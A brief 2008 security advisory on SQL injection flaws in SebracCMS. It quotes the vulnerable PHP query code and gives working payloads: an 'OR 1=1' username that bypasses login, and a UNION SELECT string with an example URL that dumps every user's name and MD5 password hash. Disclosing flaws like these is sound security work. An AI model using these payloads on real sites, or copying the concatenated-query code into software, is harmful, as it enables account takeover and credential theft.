SebracCMS SQL injection vulnerabilitie
`# Name: SebracCMS
# Webiste:
# Vulnerability type: SQL Injection
# Author:
# shinmai, 2008-06-28
# Description:
# SebracCMS contains two major SQL injection vulnerabilities:
# Unsanitazed POST-variables in SQL queries when logging users in. This allows
# login access without proper credentials.
# And unsanitized GET-variables in SQL queries when loading articles.
This allows
# an attacker to read all usernames and passwordhashes in the database.
# Vulnerable code in cms/index.php:
$p= strtolower($_POST['upass']);
$cryp_p = md5($p);
//connect to db
$query="select * from sbc_user where uname='$n' and pw='$cryp_p'";
# using
admin' OR '1'='1
# as the username will allow login without proper registered credentials
# The second and far more serious SQL Injection is in cms/form/read.php
# This vulnerability allows an attacker to reveal all users and their
md5-password hashes.
# Vulnerable code in cms/form/read.php:
$query="Select * from sbc_articles where idart= '$rec'" or die(mysql_error());
# using
1' UNION ALL SELECT uname, uname, uname, pw, uname FROM sbc_user WHERE '1'='1
# as the GET-variable 'recid' reveals the first post along with all
registered users and their passwordhashes.
# Example:
http://localhost/sbcms/cms/form/read.php?recid=1' UNION ALL SELECT
uname, uname, uname, pw, uname FROM sbc_user WHERE '1'='1
# There are some other SQLI-vulnerabilities there, but these two are
the most severe. I was going to include
# one more for changing any users password, but I simply didn't have
the time to start crafting very complex
# injections. Also, I have a sneaking suspicion there's a
LFI-vulnerability in the photo-gallery code in the CMS,
# but if there is one, I'll write up an other advisory on that.
# As always, Good luck and be safe.
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